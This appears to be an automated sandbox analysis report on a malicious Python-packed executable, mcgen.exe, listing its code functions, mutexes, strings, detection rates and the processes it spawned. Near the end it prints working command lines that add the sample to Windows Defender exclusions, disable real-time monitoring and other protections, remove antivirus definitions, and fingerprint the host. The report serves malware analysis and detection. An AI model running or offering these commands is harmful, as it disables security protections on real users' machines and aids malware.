Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CE2890	103_2_00007FF695CE2890
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CD8884	103_2_00007FF695CD8884
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D218A8	103_2_00007FF695D218A8
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CE17C8	103_2_00007FF695CE17C8
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CF67E0	103_2_00007FF695CF67E0
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D2832C	103_2_00007FF695D2832C
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D21314	103_2_00007FF695D21314
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CED2C0	103_2_00007FF695CED2C0
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CD42E0	103_2_00007FF695CD42E0
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D102A4	103_2_00007FF695D102A4
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CDF24C	103_2_00007FF695CDF24C
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CF7244	103_2_00007FF695CF7244
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D22268	103_2_00007FF695D22268
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CEE21C	103_2_00007FF695CEE21C
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D341CC	103_2_00007FF695D341CC
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D181CC	103_2_00007FF695D181CC
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D12164	103_2_00007FF695D12164
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CDA504	103_2_00007FF695CDA504
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D15468	103_2_00007FF695D15468
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CFD458	103_2_00007FF695CFD458
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CFC3E0	103_2_00007FF695CFC3E0
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D00374	103_2_00007FF695D00374
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CE2360	103_2_00007FF695CE2360
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CD9EFC	103_2_00007FF695CD9EFC
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D0AF0C	103_2_00007FF695D0AF0C
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D1EEA4	103_2_00007FF695D1EEA4
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CDCE84	103_2_00007FF695CDCE84
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D2FE74	103_2_00007FF695D2FE74
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CE8E68	103_2_00007FF695CE8E68
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D1AE50	103_2_00007FF695D1AE50
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CDEE08	103_2_00007FF695CDEE08
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CE1E04	103_2_00007FF695CE1E04
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D21DCC	103_2_00007FF695D21DCC
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D19D74	103_2_00007FF695D19D74
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CF0104	103_2_00007FF695CF0104
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D300F0	103_2_00007FF695D300F0
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D08040	103_2_00007FF695D08040
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D00074	103_2_00007FF695D00074
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CFC05C	103_2_00007FF695CFC05C
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CE3030	103_2_00007FF695CE3030
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D0C00C	103_2_00007FF695D0C00C
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D3DFD8	103_2_00007FF695D3DFD8
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D14FE8	103_2_00007FF695D14FE8
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D3AF90	103_2_00007FF695D3AF90
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D05F4C	103_2_00007FF695D05F4C
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CDCB14	103_2_00007FF695CDCB14
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D3AAC0	103_2_00007FF695D3AAC0
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D0FA6C	103_2_00007FF695D0FA6C
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D15A70	103_2_00007FF695D15A70
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D169FD	103_2_00007FF695D169FD
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CD49B8	103_2_00007FF695CD49B8
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CFD97C	103_2_00007FF695CFD97C
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CF9D0C	103_2_00007FF695CF9D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CDDD04	103_2_00007FF695CDDD04
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D00D20	103_2_00007FF695D00D20
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D26D0C	103_2_00007FF695D26D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D15C8C	103_2_00007FF695D15C8C
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CE8C30	103_2_00007FF695CE8C30
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D29B98	103_2_00007FF695D29B98
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D14B38	103_2_00007FF695D14B38

Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: String function: 00007FF695CE8444 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: String function: 00007FF695D149F4 appears 53 times
Source: C:\Users\user\Desktop\mcgen.exe	Code function: String function: 00007FFDA33BD32F appears 77 times
Source: C:\Users\user\Desktop\mcgen.exe	Code function: String function: 00007FFD940DA510 appears 42 times
Source: C:\Users\user\Desktop\mcgen.exe	Code function: String function: 00007FF6B9F12710 appears 68 times
Source: C:\Users\user\Desktop\mcgen.exe	Code function: String function: 00007FFD940D9350 appears 37 times
Source: C:\Users\user\Desktop\mcgen.exe	Code function: String function: 00007FFDA3341325 appears 93 times
Source: C:\Users\user\Desktop\mcgen.exe	Code function: String function: 00007FFDA33BD341 appears 340 times

Source: mcgen.exe

Static PE information: invalid certificate

Source: rar.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: mcgen.exe	Binary or memory string: OriginalFilename vs mcgen.exe
Source: mcgen.exe, 00000000.00000003.2125083047.0000024512160000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs mcgen.exe
Source: mcgen.exe, 00000000.00000003.2121600244.0000024512160000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs mcgen.exe
Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibsslH vs mcgen.exe
Source: mcgen.exe, 00000000.00000003.2121226107.0000024512160000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs mcgen.exe
Source: mcgen.exe, 00000000.00000003.2121139927.0000024512160000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs mcgen.exe
Source: mcgen.exe, 00000000.00000003.2124808250.0000024512160000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs mcgen.exe
Source: mcgen.exe, 00000000.00000003.2121508208.0000024512160000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs mcgen.exe
Source: mcgen.exe, 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCheckNetIsolation.exej% vs mcgen.exe
Source: mcgen.exe, 00000000.00000003.2121004695.0000024512160000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs mcgen.exe
Source: mcgen.exe, 00000000.00000003.2124645365.0000024512160000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs mcgen.exe
Source: mcgen.exe, 00000000.00000003.2121415784.0000024512160000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs mcgen.exe
Source: mcgen.exe, 00000000.00000003.2120892411.0000024512160000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs mcgen.exe
Source: mcgen.exe, 00000000.00000003.2121331109.0000024512160000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs mcgen.exe
Source: mcgen.exe, 00000000.00000003.2120799474.0000024512160000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs mcgen.exe
Source: mcgen.exe, 00000000.00000003.2120621510.0000024512160000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs mcgen.exe
Source: mcgen.exe	Binary or memory string: OriginalFilename vs mcgen.exe
Source: mcgen.exe, 00000002.00000000.2125704331.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCheckNetIsolation.exej% vs mcgen.exe
Source: mcgen.exe, 00000002.00000002.2536310062.00007FFD948A7000.00000004.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenamepython313.dll. vs mcgen.exe
Source: mcgen.exe, 00000002.00000002.2538045588.00007FFDA3A93000.00000004.00000001.01000000.00000011.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs mcgen.exe
Source: mcgen.exe, 00000002.00000002.2537297636.00007FFDA3474000.00000004.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs mcgen.exe
Source: mcgen.exe, 00000002.00000002.2533464335.00007FFD93B82000.00000004.00000001.01000000.00000013.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs mcgen.exe
Source: mcgen.exe, 00000002.00000002.2538520502.00007FFDA4178000.00000004.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs mcgen.exe
Source: mcgen.exe, 00000002.00000002.2538326175.00007FFDA3AF8000.00000004.00000001.01000000.0000000C.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs mcgen.exe
Source: mcgen.exe, 00000002.00000002.2539577010.00007FFDAC06A000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs mcgen.exe
Source: mcgen.exe, 00000002.00000002.2536779033.00007FFDA3409000.00000004.00000001.01000000.00000010.sdmp	Binary or memory string: OriginalFilenamelibsslH vs mcgen.exe
Source: mcgen.exe, 00000002.00000002.2538896245.00007FFDA549C000.00000004.00000001.01000000.0000000D.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs mcgen.exe
Source: mcgen.exe, 00000002.00000002.2537814722.00007FFDA3516000.00000004.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs mcgen.exe
Source: mcgen.exe, 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs mcgen.exe
Source: mcgen.exe, 00000002.00000002.2538708212.00007FFDA4DAC000.00000004.00000001.01000000.00000012.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs mcgen.exe
Source: mcgen.exe, 00000002.00000002.2537529762.00007FFDA34AA000.00000004.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs mcgen.exe
Source: mcgen.exe, 00000002.00000002.2534814877.00007FFD9409A000.00000004.00000001.01000000.0000000F.sdmp	Binary or memory string: OriginalFilenamelibcryptoH vs mcgen.exe
Source: mcgen.exe, 00000002.00000002.2537063679.00007FFDA3442000.00000004.00000001.01000000.0000000E.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs mcgen.exe
Source: mcgen.exe	Binary or memory string: OriginalFilenameCheckNetIsolation.exej% vs mcgen.exe

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

Source: C:\Users\user\Desktop\mcgen.exe	Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615
Source: C:\Users\user\Desktop\mcgen.exe	Process created: Commandline size = 3647	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615

Source: libcrypto-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
Source: libssl-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
Source: python313.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9994215874784359
Source: sqlite3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9980279432552503
Source: unicodedata.pyd.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9925709355828221

Source: classification engine

Classification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@200/57@4/2

Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe

Code function: 103_2_00007FF695CECAFC GetLastError,FormatMessageW,

103_2_00007FF695CECAFC

Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D1B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,		103_2_00007FF695D1B57C
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CEEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		103_2_00007FF695CEEF50

Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe

Code function: 103_2_00007FF695CF3144 GetDiskFreeSpaceExW,

103_2_00007FF695CF3144

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6036:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:364:120:WilError_03
Source: C:\Users\user\Desktop\mcgen.exe	Mutant created: \Sessions\1\BaseNamedObjects\L
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2016:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2168:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2536:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3816:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1600:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5644:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7288:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2404:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6312:120:WilError_03

Source: C:\Users\user\Desktop\mcgen.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI32122

Jump to behavior

Source: mcgen.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\mcgen.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\mcgen.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: mcgen.exe, 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: mcgen.exe, mcgen.exe, 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: mcgen.exe, mcgen.exe, 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: mcgen.exe, mcgen.exe, 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: mcgen.exe, mcgen.exe, 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: mcgen.exe, mcgen.exe, 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: mcgen.exe, mcgen.exe, 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: mcgen.exe	Virustotal: Detection: 44%
Source: mcgen.exe	ReversingLabs: Detection: 47%

Source: mcgen.exe	String found in binary or memory: id-cmc-addExtensions
Source: mcgen.exe	String found in binary or memory: set-addPolicy
Source: mcgen.exe	String found in binary or memory: --help
Source: mcgen.exe	String found in binary or memory: --help
Source: mcgen.exe	String found in binary or memory: can't send non-None value to a just-started coroutine
Source: mcgen.exe	String found in binary or memory: various kinds of output. Setting it to 0 deactivates this behavior. PYTHON_HISTORY : the location of a .python_history file. These variables have equivalent command-line options (see --help for details): PYTHON_CPU_COUNT: override the retu
Source: mcgen.exe	String found in binary or memory: various kinds of output. Setting it to 0 deactivates this behavior. PYTHON_HISTORY : the location of a .python_history file. These variables have equivalent command-line options (see --help for details): PYTHON_CPU_COUNT: override the retu
Source: mcgen.exe	String found in binary or memory: can't send non-None value to a just-started async generator
Source: mcgen.exe	String found in binary or memory: can't send non-None value to a just-started generator
Source: mcgen.exe	String found in binary or memory: fma($module, x, y, z, /) -- Fused multiply-add operation. Compute (x * y) + z with a single round.

Source: C:\Users\user\Desktop\mcgen.exe

File read: C:\Users\user\Desktop\mcgen.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\mcgen.exe "C:\Users\user\Desktop\mcgen.exe"
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Users\user\Desktop\mcgen.exe "C:\Users\user\Desktop\mcgen.exe"
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'"
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
